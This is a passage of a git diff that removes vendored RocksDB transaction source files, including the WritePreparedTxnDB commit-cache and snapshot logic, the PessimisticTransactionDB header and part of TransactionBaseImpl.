-        // is done atomically with obtaining the snapshot list, the one with
-        // the larger seq is more fresh. If the seq is equal the full snapshot
-        // list could be different since taking snapshots does not increase
-        // the db seq. However since we only care about snapshots before the
-        // new max, such recent snapshots would not be included the in the
-        // list anyway.
-        curr_seq = db_impl_->GetLatestSequenceNumber();
-        if (curr_seq > snapshots_version_) {
-          // This is to avoid updating the snapshots_ if it already updated
-          // with a more recent vesion by a concrrent thread
-          update_snapshots = true;
-          // We only care about snapshots lower then max
-          all_snapshots =
-              db_impl_->snapshots().GetAll(nullptr, max_evicted_seq);
-        }
-      }
-      if (update_snapshots) {
-        WriteLock wl(&snapshots_mutex_);
-        snapshots_version_ = curr_seq;
-        // We update the list concurrently with the readers.
-        // Both new and old lists are sorted and the new list is subset of the
-        // previous list plus some new items. Thus if a snapshot repeats in
-        // both new and old lists, it will appear upper in the new list. So if
-        // we simply insert the new snapshots in order, if an overwritten item
-        // is still valid in the new list is either written to the same place in
-        // the array or it is written in a higher palce before it gets
-        // overwritten by another item. This guarantess a reader that reads the
-        // list bottom-up will eventaully see a snapshot that repeats in the
-        // update, either before it gets overwritten by the writer or
-        // afterwards.
-        size_t i = 0;
-        auto it = all_snapshots.begin();
-        for (; it != all_snapshots.end() && i < SNAPSHOT_CACHE_SIZE;
-             it++, i++) {
-          snapshot_cache_[i].store(*it, std::memory_order_release);
-        }
-        snapshots_.clear();
-        for (; it != all_snapshots.end(); it++) {
-          // Insert them to a vector that is less efficient to access
-          // concurrently
-          snapshots_.push_back(*it);
-        }
-        // Update the size at the end. Otherwise a parallel reader might read
-        // items that are not set yet.
-        snapshots_total_.store(all_snapshots.size(), std::memory_order_release);
-      }
-      while (prev_max < max_evicted_seq &&
-             !max_evicted_seq_.compare_exchange_weak(
-                 prev_max, max_evicted_seq, std::memory_order_release,
-                 std::memory_order_acquire)) {
-      };
-    }
-    // After each eviction from commit cache, check if the commit entry should
-    // be kept around because it overlaps with a live snapshot.
-    // First check the snapshot cache that is efficient for concurrent access
-    auto cnt = snapshots_total_.load(std::memory_order_acquire);
-    // The list might get updated concurrently as we are reading from it. The
-    // reader should be able to read all the snapshots that are still valid
-    // after the update. Since the survived snapshots are written in a higher
-    // place before gets overwritten the reader that reads bottom-up will
-    // eventully see it.
-    const bool next_is_larger = true;
-    SequenceNumber snapshot_seq = kMaxSequenceNumber;
-    size_t ip1 = std::min(cnt, SNAPSHOT_CACHE_SIZE);
-    for (; 0 < ip1; ip1--) {
-      snapshot_seq = snapshot_cache_[ip1 - 1].load(std::memory_order_acquire);
-      if (!MaybeUpdateOldCommitMap(evicted.prep_seq, evicted.commit_seq,
-                                   snapshot_seq, !next_is_larger)) {
-        break;
-      }
-    }
-    if (UNLIKELY(SNAPSHOT_CACHE_SIZE < cnt && ip1 == SNAPSHOT_CACHE_SIZE &&
-                 snapshot_seq < evicted.prep_seq)) {
-      // Then access the less efficient list of snapshots_
-      ReadLock rl(&snapshots_mutex_);
-      // Items could have moved from the snapshots_ to snapshot_cache_ before
-      // accquiring the lock. To make sure that we do not miss a valid snapshot,
-      // read snapshot_cache_ again while holding the lock.
-      for (size_t i = 0; i < SNAPSHOT_CACHE_SIZE; i++) {
-        snapshot_seq = snapshot_cache_[i].load(std::memory_order_acquire);
-        if (!MaybeUpdateOldCommitMap(evicted.prep_seq, evicted.commit_seq,
-                                     snapshot_seq, next_is_larger)) {
-          break;
-        }
-      }
-      for (auto snapshot_seq_2 : snapshots_) {
-        if (!MaybeUpdateOldCommitMap(evicted.prep_seq, evicted.commit_seq,
-                                     snapshot_seq_2, next_is_larger)) {
-          break;
-        }
-      }
-    }
-  }
-  bool succ =
-      ExchangeCommitEntry(indexed_seq, evicted, {prepare_seq, commit_seq});
-  if (!succ) {
-    // A very rare event, in which the commit entry is updated before we do.
-    // Here we apply a very simple solution of retrying.
-    // TODO(myabandeh): do precautions to detect bugs that cause infinite loops
-    AddCommitted(prepare_seq, commit_seq);
-    return;
-  }
-  {
-    WriteLock wl(&prepared_mutex_);
-    prepared_txns_.erase(prepare_seq);
-    bool was_empty = delayed_prepared_.empty();
-    if (!was_empty) {
-      delayed_prepared_.erase(prepare_seq);
-      bool is_empty = delayed_prepared_.empty();
-      if (was_empty != is_empty) {
-        delayed_prepared_empty_.store(is_empty, std::memory_order_release);
-      }
-    }
-  }
-}
-
-bool WritePreparedTxnDB::GetCommitEntry(uint64_t indexed_seq,
-                                        CommitEntry* entry) {
-  // TODO(myabandeh): implement lock-free commit_cache_
-  ReadLock rl(&commit_cache_mutex_);
-  *entry = commit_cache_[indexed_seq];
-  return (entry->commit_seq != 0);  // initialized
-}
-
-bool WritePreparedTxnDB::AddCommitEntry(uint64_t indexed_seq,
-                                        CommitEntry& new_entry,
-                                        CommitEntry* evicted_entry) {
-  // TODO(myabandeh): implement lock-free commit_cache_
-  WriteLock wl(&commit_cache_mutex_);
-  *evicted_entry = commit_cache_[indexed_seq];
-  commit_cache_[indexed_seq] = new_entry;
-  return (evicted_entry->commit_seq != 0);  // initialized
-}
-
-bool WritePreparedTxnDB::ExchangeCommitEntry(uint64_t indexed_seq,
-                                             CommitEntry& expected_entry,
-                                             CommitEntry new_entry) {
-  // TODO(myabandeh): implement lock-free commit_cache_
-  WriteLock wl(&commit_cache_mutex_);
-  auto& evicted_entry = commit_cache_[indexed_seq];
-  if (evicted_entry.prep_seq != expected_entry.prep_seq) {
-    return false;
-  }
-  commit_cache_[indexed_seq] = new_entry;
-  return true;
-}
-
-// 10m entry, 80MB size
-size_t WritePreparedTxnDB::DEF_COMMIT_CACHE_SIZE = static_cast<size_t>(1 << 21);
-size_t WritePreparedTxnDB::DEF_SNAPSHOT_CACHE_SIZE =
-    static_cast<size_t>(1 << 7);
-
-bool WritePreparedTxnDB::MaybeUpdateOldCommitMap(
-    const uint64_t& prep_seq, const uint64_t& commit_seq,
-    const uint64_t& snapshot_seq, const bool next_is_larger = true) {
-  // If we do not store an entry in old_commit_map we assume it is committed in
-  // all snapshots. if commit_seq <= snapshot_seq, it is considered already in
-  // the snapshot so we need not to keep the entry around for this snapshot.
-  if (commit_seq <= snapshot_seq) {
-    // continue the search if the next snapshot could be smaller than commit_seq
-    return !next_is_larger;
-  }
-  // then snapshot_seq < commit_seq
-  if (prep_seq <= snapshot_seq) {  // overlapping range
-    WriteLock wl(&old_commit_map_mutex_);
-    old_commit_map_empty_.store(false, std::memory_order_release);
-    old_commit_map_[prep_seq] = commit_seq;
-    // Storing once is enough. No need to check it for other snapshots.
-    return false;
-  }
-  // continue the search if the next snapshot could be larger than prep_seq
-  return next_is_larger;
-}
-
-}  //  namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/transactions/pessimistic_transaction_db.h b/thirdparty/rocksdb/utilities/transactions/pessimistic_transaction_db.h
deleted file mode 100644
index e3eec6b..0000000
--- a/thirdparty/rocksdb/utilities/transactions/pessimistic_transaction_db.h
+++ /dev/null
@@ -1,316 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include <mutex>
-#include <queue>
-#include <set>
-#include <string>
-#include <unordered_map>
-#include <vector>
-
-#include "rocksdb/db.h"
-#include "rocksdb/options.h"
-#include "rocksdb/utilities/transaction_db.h"
-#include "utilities/transactions/pessimistic_transaction.h"
-#include "utilities/transactions/transaction_lock_mgr.h"
-#include "utilities/transactions/write_prepared_txn.h"
-
-namespace rocksdb {
-
-class PessimisticTransactionDB : public TransactionDB {
- public:
-  explicit PessimisticTransactionDB(DB* db,
-                                    const TransactionDBOptions& txn_db_options);
-
-  explicit PessimisticTransactionDB(StackableDB* db,
-                                    const TransactionDBOptions& txn_db_options);
-
-  virtual ~PessimisticTransactionDB();
-
-  Status Initialize(const std::vector<size_t>& compaction_enabled_cf_indices,
-                    const std::vector<ColumnFamilyHandle*>& handles);
-
-  Transaction* BeginTransaction(const WriteOptions& write_options,
-                                const TransactionOptions& txn_options,
-                                Transaction* old_txn) override = 0;
-
-  using StackableDB::Put;
-  virtual Status Put(const WriteOptions& options,
-                     ColumnFamilyHandle* column_family, const Slice& key,
-                     const Slice& val) override;
-
-  using StackableDB::Delete;
-  virtual Status Delete(const WriteOptions& wopts,
-                        ColumnFamilyHandle* column_family,
-                        const Slice& key) override;
-
-  using StackableDB::Merge;
-  virtual Status Merge(const WriteOptions& options,
-                       ColumnFamilyHandle* column_family, const Slice& key,
-                       const Slice& value) override;
-
-  using StackableDB::Write;
-  virtual Status Write(const WriteOptions& opts, WriteBatch* updates) override;
-
-  using StackableDB::CreateColumnFamily;
-  virtual Status CreateColumnFamily(const ColumnFamilyOptions& options,
-                                    const std::string& column_family_name,
-                                    ColumnFamilyHandle** handle) override;
-
-  using StackableDB::DropColumnFamily;
-  virtual Status DropColumnFamily(ColumnFamilyHandle* column_family) override;
-
-  Status TryLock(PessimisticTransaction* txn, uint32_t cfh_id,
-                 const std::string& key, bool exclusive);
-
-  void UnLock(PessimisticTransaction* txn, const TransactionKeyMap* keys);
-  void UnLock(PessimisticTransaction* txn, uint32_t cfh_id,
-              const std::string& key);
-
-  void AddColumnFamily(const ColumnFamilyHandle* handle);
-
-  static TransactionDBOptions ValidateTxnDBOptions(
-      const TransactionDBOptions& txn_db_options);
-
-  const TransactionDBOptions& GetTxnDBOptions() const {
-    return txn_db_options_;
-  }
-
-  void InsertExpirableTransaction(TransactionID tx_id,
-                                  PessimisticTransaction* tx);
-  void RemoveExpirableTransaction(TransactionID tx_id);
-
-  // If transaction is no longer available, locks can be stolen
-  // If transaction is available, try stealing locks directly from transaction
-  // It is the caller's responsibility to ensure that the referred transaction
-  // is expirable (GetExpirationTime() > 0) and that it is expired.
-  bool TryStealingExpiredTransactionLocks(TransactionID tx_id);
-
-  Transaction* GetTransactionByName(const TransactionName& name) override;
-
-  void RegisterTransaction(Transaction* txn);
-  void UnregisterTransaction(Transaction* txn);
-
-  // not thread safe. current use case is during recovery (single thread)
-  void GetAllPreparedTransactions(std::vector<Transaction*>* trans) override;
-
-  TransactionLockMgr::LockStatusData GetLockStatusData() override;
-
-  std::vector<DeadlockPath> GetDeadlockInfoBuffer() override;
-  void SetDeadlockInfoBufferSize(uint32_t target_size) override;
-
-  struct CommitEntry {
-    uint64_t prep_seq;
-    uint64_t commit_seq;
-    CommitEntry() : prep_seq(0), commit_seq(0) {}
-    CommitEntry(uint64_t ps, uint64_t cs) : prep_seq(ps), commit_seq(cs) {}
-  };
-
- protected:
-  void ReinitializeTransaction(
-      Transaction* txn, const WriteOptions& write_options,
-      const TransactionOptions& txn_options = TransactionOptions());
-  DBImpl* db_impl_;
-  std::shared_ptr<Logger> info_log_;
-
- private:
-  friend class WritePreparedTxnDB;
-  const TransactionDBOptions txn_db_options_;
-  TransactionLockMgr lock_mgr_;
-
-  // Must be held when adding/dropping column families.
-  InstrumentedMutex column_family_mutex_;
-  Transaction* BeginInternalTransaction(const WriteOptions& options);
-
-  // Used to ensure that no locks are stolen from an expirable transaction
-  // that has started a commit. Only transactions with an expiration time
-  // should be in this map.
-  std::mutex map_mutex_;
-  std::unordered_map<TransactionID, PessimisticTransaction*>
-      expirable_transactions_map_;
-
-  // map from name to two phase transaction instance
-  std::mutex name_map_mutex_;
-  std::unordered_map<TransactionName, Transaction*> transactions_;
-};
-
-// A PessimisticTransactionDB that writes the data to the DB after the commit.
-// In this way the DB only contains the committed data.
-class WriteCommittedTxnDB : public PessimisticTransactionDB {
- public:
-  explicit WriteCommittedTxnDB(DB* db,
-                               const TransactionDBOptions& txn_db_options)
-      : PessimisticTransactionDB(db, txn_db_options) {}
-
-  explicit WriteCommittedTxnDB(StackableDB* db,
-                               const TransactionDBOptions& txn_db_options)
-      : PessimisticTransactionDB(db, txn_db_options) {}
-
-  virtual ~WriteCommittedTxnDB() {}
-
-  Transaction* BeginTransaction(const WriteOptions& write_options,
-                                const TransactionOptions& txn_options,
-                                Transaction* old_txn) override;
-};
-
-// A PessimisticTransactionDB that writes data to DB after prepare phase of 2PC.
-// In this way some data in the DB might not be committed. The DB provides
-// mechanisms to tell such data apart from committed data.
-class WritePreparedTxnDB : public PessimisticTransactionDB {
- public:
-  explicit WritePreparedTxnDB(DB* db,
-                              const TransactionDBOptions& txn_db_options)
-      : PessimisticTransactionDB(db, txn_db_options),
-        SNAPSHOT_CACHE_SIZE(DEF_SNAPSHOT_CACHE_SIZE),
-        COMMIT_CACHE_SIZE(DEF_COMMIT_CACHE_SIZE) {
-    init(txn_db_options);
-  }
-
-  explicit WritePreparedTxnDB(StackableDB* db,
-                              const TransactionDBOptions& txn_db_options)
-      : PessimisticTransactionDB(db, txn_db_options),
-        SNAPSHOT_CACHE_SIZE(DEF_SNAPSHOT_CACHE_SIZE),
-        COMMIT_CACHE_SIZE(DEF_COMMIT_CACHE_SIZE) {
-    init(txn_db_options);
-  }
-
-  virtual ~WritePreparedTxnDB() {}
-
-  Transaction* BeginTransaction(const WriteOptions& write_options,
-                                const TransactionOptions& txn_options,
-                                Transaction* old_txn) override;
-
-  // Check whether the transaction that wrote the value with seqeunce number seq
-  // is visible to the snapshot with sequence number snapshot_seq
-  bool IsInSnapshot(uint64_t seq, uint64_t snapshot_seq);
-  // Add the trasnaction with prepare sequence seq to the prepared list
-  void AddPrepared(uint64_t seq);
-  // Add the transaction with prepare sequence prepare_seq and commit sequence
-  // commit_seq to the commit map
-  void AddCommitted(uint64_t prepare_seq, uint64_t commit_seq);
-
- private:
-  friend class WritePreparedTransactionTest_IsInSnapshotTest_Test;
-
-  void init(const TransactionDBOptions& /* unused */) {
-    snapshot_cache_ = unique_ptr<std::atomic<SequenceNumber>[]>(
-        new std::atomic<SequenceNumber>[SNAPSHOT_CACHE_SIZE] {});
-    commit_cache_ =
-        unique_ptr<CommitEntry[]>(new CommitEntry[COMMIT_CACHE_SIZE]{});
-  }
-
-  // A heap with the amortized O(1) complexity for erase. It uses one extra heap
-  // to keep track of erased entries that are not yet on top of the main heap.
-  class PreparedHeap {
-    std::priority_queue<uint64_t, std::vector<uint64_t>, std::greater<uint64_t>>
-        heap_;
-    std::priority_queue<uint64_t, std::vector<uint64_t>, std::greater<uint64_t>>
-        erased_heap_;
-
-   public:
-    bool empty() { return heap_.empty(); }
-    uint64_t top() { return heap_.top(); }
-    void push(uint64_t v) { heap_.push(v); }
-    void pop() {
-      heap_.pop();
-      while (!heap_.empty() && !erased_heap_.empty() &&
-             heap_.top() == erased_heap_.top()) {
-        heap_.pop();
-        erased_heap_.pop();
-      }
-    }
-    void erase(uint64_t seq) {
-      if (!heap_.empty()) {
-        if (seq < heap_.top()) {
-          // Already popped, ignore it.
-        } else if (heap_.top() == seq) {
-          heap_.pop();
-        } else {  // (heap_.top() > seq)
-          // Down the heap, remember to pop it later
-          erased_heap_.push(seq);
-        }
-      }
-    }
-  };
-
-  // Get the commit entry with index indexed_seq from the commit table. It
-  // returns true if such entry exists.
-  bool GetCommitEntry(uint64_t indexed_seq, CommitEntry* entry);
-  // Rewrite the entry with the index indexed_seq in the commit table with the
-  // commit entry <prep_seq, commit_seq>. If the rewrite results into eviction,
-  // sets the evicted_entry and returns true.
-  bool AddCommitEntry(uint64_t indexed_seq, CommitEntry& new_entry,
-                      CommitEntry* evicted_entry);
-  // Rewrite the entry with the index indexed_seq in the commit table with the
-  // commit entry new_entry only if the existing entry matches the
-  // expected_entry. Returns false otherwise.
-  bool ExchangeCommitEntry(uint64_t indexed_seq, CommitEntry& expected_entry,
-                           CommitEntry new_entry);
-
-  // Add a new entry to old_commit_map_ if prep_seq <= snapshot_seq <
-  // commit_seq. Return false if checking the next snapshot(s) is not needed.
-  // This is the case if the entry already added to old_commit_map_ or none of
-  // the next snapshots could satisfy the condition. next_is_larger: the next
-  // snapshot will be a larger value
-  bool MaybeUpdateOldCommitMap(const uint64_t& prep_seq,
-                               const uint64_t& commit_seq,
-                               const uint64_t& snapshot_seq,
-                               const bool next_is_larger);
-
-  // The list of live snapshots at the last time that max_evicted_seq_ advanced.
-  // The list stored into two data structures: in snapshot_cache_ that is
-  // efficient for concurrent reads, and in snapshots_ if the data does not fit
-  // into snapshot_cache_. The total number of snapshots in the two lists
-  std::atomic<size_t> snapshots_total_ = {};
-  // The list sorted in ascending order. Thread-safety for writes is provided
-  // with snapshots_mutex_ and concurrent reads are safe due to std::atomic for
-  // each entry. In x86_64 architecture such reads are compiled to simple read
-  // instructions. 128 entries
-  // TODO(myabandeh): avoid non-const static variables
-  static size_t DEF_SNAPSHOT_CACHE_SIZE;
-  const size_t SNAPSHOT_CACHE_SIZE;
-  unique_ptr<std::atomic<SequenceNumber>[]> snapshot_cache_;
-  // 2nd list for storing snapshots. The list sorted in ascending order.
-  // Thread-safety is provided with snapshots_mutex_.
-  std::vector<SequenceNumber> snapshots_;
-  // The version of the latest list of snapshots. This can be used to avoid
-  // rewrittiing a list that is concurrently updated with a more recent version.
-  SequenceNumber snapshots_version_ = 0;
-
-  // A heap of prepared transactions. Thread-safety is provided with
-  // prepared_mutex_.
-  PreparedHeap prepared_txns_;
-  // TODO(myabandeh): avoid non-const static variables
-  static size_t DEF_COMMIT_CACHE_SIZE;
-  const size_t COMMIT_CACHE_SIZE;
-  // commit_cache_ must be initialized to zero to tell apart an empty index from
-  // a filled one. Thread-safety is provided with commit_cache_mutex_.
-  unique_ptr<CommitEntry[]> commit_cache_;
-  // The largest evicted *commit* sequence number from the commit_cache_
-  std::atomic<uint64_t> max_evicted_seq_ = {};
-  // A map of the evicted entries from commit_cache_ that has to be kept around
-  // to service the old snapshots. This is expected to be empty normally.
-  // Thread-safety is provided with old_commit_map_mutex_.
-  std::map<uint64_t, uint64_t> old_commit_map_;
-  // A set of long-running prepared transactions that are not finished by the
-  // time max_evicted_seq_ advances their sequence number. This is expected to
-  // be empty normally. Thread-safety is provided with prepared_mutex_.
-  std::set<uint64_t> delayed_prepared_;
-  // Update when delayed_prepared_.empty() changes. Expected to be true
-  // normally.
-  std::atomic<bool> delayed_prepared_empty_ = {true};
-  // Update when old_commit_map_.empty() changes. Expected to be true normally.
-  std::atomic<bool> old_commit_map_empty_ = {true};
-  port::RWMutex prepared_mutex_;
-  port::RWMutex old_commit_map_mutex_;
-  port::RWMutex commit_cache_mutex_;
-  port::RWMutex snapshots_mutex_;
-};
-
-}  //  namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/transactions/transaction_base.cc b/thirdparty/rocksdb/utilities/transactions/transaction_base.cc
deleted file mode 100644
index 4612dfa..0000000
--- a/thirdparty/rocksdb/utilities/transactions/transaction_base.cc
+++ /dev/null
@@ -1,704 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "utilities/transactions/transaction_base.h"
-
-#include "db/db_impl.h"
-#include "db/column_family.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/db.h"
-#include "rocksdb/status.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-TransactionBaseImpl::TransactionBaseImpl(DB* db,
-                                         const WriteOptions& write_options)
-    : db_(db),
-      dbimpl_(reinterpret_cast<DBImpl*>(db)),
-      write_options_(write_options),
-      cmp_(GetColumnFamilyUserComparator(db->DefaultColumnFamily())),
-      start_time_(db_->GetEnv()->NowMicros()),
-      write_batch_(cmp_, 0, true, 0),
-      indexing_enabled_(true) {
-  assert(dynamic_cast<DBImpl*>(db_) != nullptr);
-  log_number_ = 0;
-  if (dbimpl_->allow_2pc()) {
-    WriteBatchInternal::InsertNoop(write_batch_.GetWriteBatch());
-  }
-}
-
-TransactionBaseImpl::~TransactionBaseImpl() {
-  // Release snapshot if snapshot is set
-  SetSnapshotInternal(nullptr);
-}
-
-void TransactionBaseImpl::Clear() {
-  save_points_.reset(nullptr);
-  write_batch_.Clear();
-  commit_time_batch_.Clear();
-  tracked_keys_.clear();
-  num_puts_ = 0;
-  num_deletes_ = 0;
-  num_merges_ = 0;
-
-  if (dbimpl_->allow_2pc()) {
-    WriteBatchInternal::InsertNoop(write_batch_.GetWriteBatch());
-  }
-}
-
-void TransactionBaseImpl::Reinitialize(DB* db,
-                                       const WriteOptions& write_options) {
-  Clear();
-  ClearSnapshot();
-  db_ = db;
-  name_.clear();
-  log_number_ = 0;
-  write_options_ = write_options;
-  start_time_ = db_->GetEnv()->NowMicros();
-  indexing_enabled_ = true;
-  cmp_ = GetColumnFamilyUserComparator(db_->DefaultColumnFamily());
-}
-
-void TransactionBaseImpl::SetSnapshot() {
-  const Snapshot* snapshot = dbimpl_->GetSnapshotForWriteConflictBoundary();
-  SetSnapshotInternal(snapshot);
-}
-
-void TransactionBaseImpl::SetSnapshotInternal(const Snapshot* snapshot) {
-  // Set a custom deleter for the snapshot_ SharedPtr as the snapshot needs to
-  // be released, not deleted when it is no longer referenced.
-  snapshot_.reset(snapshot, std::bind(&TransactionBaseImpl::ReleaseSnapshot,
-                                      this, std::placeholders::_1, db_));
-  snapshot_needed_ = false;
-  snapshot_notifier_ = nullptr;
-}
-
-void TransactionBaseImpl::SetSnapshotOnNextOperation(
-    std::shared_ptr<TransactionNotifier> notifier) {
-  snapshot_needed_ = true;
-  snapshot_notifier_ = notifier;
-}
-
-void TransactionBaseImpl::SetSnapshotIfNeeded() {
-  if (snapshot_needed_) {
-    std::shared_ptr<TransactionNotifier> notifier = snapshot_notifier_;
-    SetSnapshot();
-    if (notifier != nullptr) {
-      notifier->SnapshotCreated(GetSnapshot());
-    }
-  }
-}
-
-Status TransactionBaseImpl::TryLock(ColumnFamilyHandle* column_family,
-                                    const SliceParts& key, bool read_only,
-                                    bool exclusive, bool untracked) {
-  size_t key_size = 0;
-  for (int i = 0; i < key.num_parts; ++i) {
-    key_size += key.parts[i].size();
-  }
-
-  std::string str;
-  str.reserve(key_size);
-
-  for (int i = 0; i < key.num_parts; ++i) {
-    str.append(key.parts[i].data(), key.parts[i].size());
-  }
-
-  return TryLock(column_family, str, read_only, exclusive, untracked);
-}
-
-void TransactionBaseImpl::SetSavePoint() {
-  if (save_points_ == nullptr) {
-    save_points_.reset(new std::stack<TransactionBaseImpl::SavePoint>());
-  }
-  save_points_->emplace(snapshot_, snapshot_needed_, snapshot_notifier_,
-                        num_puts_, num_deletes_, num_merges_);
-  write_batch_.SetSavePoint();
-}
-
-Status TransactionBaseImpl::RollbackToSavePoint() {
-  if (save_points_ != nullptr && save_points_->size() > 0) {
-    // Restore saved SavePoint
-    TransactionBaseImpl::SavePoint& save_point = save_points_->top();
-    snapshot_ = save_point.snapshot_;
-    snapshot_needed_ = save_point.snapshot_needed_;
-    snapshot_notifier_ = save_point.snapshot_notifier_;
-    num_puts_ = save_point.num_puts_;
-    num_deletes_ = save_point.num_deletes_;
-    num_merges_ = save_point.num_merges_;
-
-    // Rollback batch
-    Status s = write_batch_.RollbackToSavePoint();
-    assert(s.ok());
-
-    // Rollback any keys that were tracked since the last savepoint
-    const TransactionKeyMap& key_map = save_point.new_keys_;
-    for (const auto& key_map_iter : key_map) {
-      uint32_t column_family_id = key_map_iter.first;
-      auto& keys = key_map_iter.second;
-
-      auto& cf_tracked_keys = tracked_keys_[column_family_id];
-
-      for (const auto& key_iter : keys) {
-        const std::string& key = key_iter.first;
-        uint32_t num_reads = key_iter.second.num_reads;
-        uint32_t num_writes = key_iter.second.num_writes;
-
-        auto tracked_keys_iter = cf_tracked_keys.find(key);
-        assert(tracked_keys_iter != cf_tracked_keys.end());
-
-        // Decrement the total reads/writes of this key by the number of
-        // reads/writes done since the last SavePoint.
-        if (num_reads > 0) {
-          assert(tracked_keys_iter->second.num_reads >= num_reads);
-          tracked_keys_iter->second.num_reads -= num_reads;
-        }
-        if (num_writes > 0) {
-          assert(tracked_keys_iter->second.num_writes >= num_writes);
-          tracked_keys_iter->second.num_writes -= num_writes;
-        }
-        if (tracked_keys_iter->second.num_reads == 0 &&
-            tracked_keys_iter->second.num_writes == 0) {
-          tracked_keys_[column_family_id].erase(tracked_keys_iter);
-        }
-      }
-    }
-
-    save_points_->pop();
-
-    return s;
-  } else {
-    assert(write_batch_.RollbackToSavePoint().IsNotFound());
-    return Status::NotFound();
-  }
-}
-
-Status TransactionBaseImpl::Get(const ReadOptions& read_options,
-                                ColumnFamilyHandle* column_family,
-                                const Slice& key, std::string* value) {
-  assert(value != nullptr);
-  PinnableSlice pinnable_val(value);
-  assert(!pinnable_val.IsPinned());
-  auto s = Get(read_options, column_family, key, &pinnable_val);
-  if (s.ok() && pinnable_val.IsPinned()) {
-    value->assign(pinnable_val.data(), pinnable_val.size());
-  }  // else value is already assigned
-  return s;
-}
-
-Status TransactionBaseImpl::Get(const ReadOptions& read_options,
-                                ColumnFamilyHandle* column_family,
-                                const Slice& key, PinnableSlice* pinnable_val) {
-  return write_batch_.GetFromBatchAndDB(db_, read_options, column_family, key,
-                                        pinnable_val);
-}
-
-Status TransactionBaseImpl::GetForUpdate(const ReadOptions& read_options,
-                                         ColumnFamilyHandle* column_family,
-                                         const Slice& key, std::string* value,
-                                         bool exclusive) {
-  Status s = TryLock(column_family, key, true /* read_only */, exclusive);
-
-  if (s.ok() && value != nullptr) {
-    assert(value != nullptr);
-    PinnableSlice pinnable_val(value);
-    assert(!pinnable_val.IsPinned());
-    s = Get(read_options, column_family, key, &pinnable_val);
-    if (s.ok() && pinnable_val.IsPinned()) {
-      value->assign(pinnable_val.data(), pinnable_val.size());
-    }  // else value is already assigned
-  }
-  return s;
-}
-
-Status TransactionBaseImpl::GetForUpdate(const ReadOptions& read_options,
-                                         ColumnFamilyHandle* column_family,
-                                         const Slice& key,
-                                         PinnableSlice* pinnable_val,
-                                         bool exclusive) {
-  Status s = TryLock(column_family, key, true /* read_only */, exclusive);
-
-  if (s.ok() && pinnable_val != nullptr) {
-    s = Get(read_options, column_family, key, pinnable_val);
-  }
-  return s;
-}
-
-std::vector<Status> TransactionBaseImpl::MultiGet(
-    const ReadOptions& read_options,
-    const std::vector<ColumnFamilyHandle*>& column_family,
-    const std::vector<Slice>& keys, std::vector<std::string>* values) {
-  size_t num_keys = keys.size();
-  values->resize(num_keys);
-
-  std::vector<Status> stat_list(num_keys);
-  for (size_t i = 0; i < num_keys; ++i) {
-    std::string* value = values ? &(*values)[i] : nullptr;
-    stat_list[i] = Get(read_options, column_family[i], keys[i], value);
-  }
-
-  return stat_list;
-}
-
-std::vector<Status> TransactionBaseImpl::MultiGetForUpdate(
-    const ReadOptions& read_options,
-    const std::vector<ColumnFamilyHandle*>& column_family,
-    const std::vector<Slice>& keys, std::vector<std::string>* values) {
-  // Regardless of whether the MultiGet succeeded, track these keys.
-  size_t num_keys = keys.size();
-  values->resize(num_keys);
-
-  // Lock all keys
-  for (size_t i = 0; i < num_keys; ++i) {
-    Status s = TryLock(column_family[i], keys[i], true /* read_only */,
-                       true /* exclusive */);
-    if (!s.ok()) {
-      // Fail entire multiget if we cannot lock all keys
-      return std::vector<Status>(num_keys, s);
-    }
-  }
-
-  // TODO(agiardullo): optimize multiget?
-  std::vector<Status> stat_list(num_keys);
-  for (size_t i = 0; i < num_keys; ++i) {
-    std::string* value = values ? &(*values)[i] : nullptr;
-    stat_list[i] = Get(read_options, column_family[i], keys[i], value);
-  }
-
-  return stat_list;
-}
-
-Iterator* TransactionBaseImpl::GetIterator(const ReadOptions& read_options) {
-  Iterator* db_iter = db_->NewIterator(read_options);
-  assert(db_iter);
-
-  return write_batch_.NewIteratorWithBase(db_iter);
-}
-
-Iterator* TransactionBaseImpl::GetIterator(const ReadOptions& read_options,
-                                           ColumnFamilyHandle* column_family) {
-  Iterator* db_iter = db_->NewIterator(read_options, column_family);
-  assert(db_iter);
-
-  return write_batch_.NewIteratorWithBase(column_family, db_iter);
-}
-
-Status TransactionBaseImpl::Put(ColumnFamilyHandle* column_family,
-                                const Slice& key, const Slice& value) {
-  Status s =
-      TryLock(column_family, key, false /* read_only */, true /* exclusive */);
-
-  if (s.ok()) {
-    s = GetBatchForWrite()->Put(column_family, key, value);
-    if (s.ok()) {
-      num_puts_++;
-    }
-  }
-
-  return s;
-}
-
-Status TransactionBaseImpl::Put(ColumnFamilyHandle* column_family,
-                                const SliceParts& key,
-                                const SliceParts& value) {
-  Status s =
-      TryLock(column_family, key, false /* read_only */, true /* exclusive */);
-
-  if (s.ok()) {
-    s = GetBatchForWrite()->Put(column_family, key, value);
-    if (s.ok()) {
-      num_puts_++;
-    }
-  }
-
-  return s;
-}
-
-Status TransactionBaseImpl::Merge(ColumnFamilyHandle* column_family,
-                                  const Slice& key, const Slice& value) {
-  Status s =
-      TryLock(column_family, key, false /* read_only */, true /* exclusive */);
-
-  if (s.ok()) {
-    s = GetBatchForWrite()->Merge(column_family, key, value);
-    if (s.ok()) {
-      num_merges_++;
-    }
-  }
-
-  return s;
-}
-
-Status TransactionBaseImpl::Delete(ColumnFamilyHandle* column_family,
-                                   const Slice& key) {
-  Status s =
-      TryLock(column_family, key, false /* read_only */, true /* exclusive */);
-
-  if (s.ok()) {
-    s = GetBatchForWrite()->Delete(column_family, key);
-    if (s.ok()) {
-      num_deletes_++;
-    }
-  }
-
-  return s;
-}
-
-Status TransactionBaseImpl::Delete(ColumnFamilyHandle* column_family,
-                                   const SliceParts& key) {
-  Status s =
-      TryLock(column_family, key, false /* read_only */, true /* exclusive */);
-
-  if (s.ok()) {
-    s = GetBatchForWrite()->Delete(column_family, key);
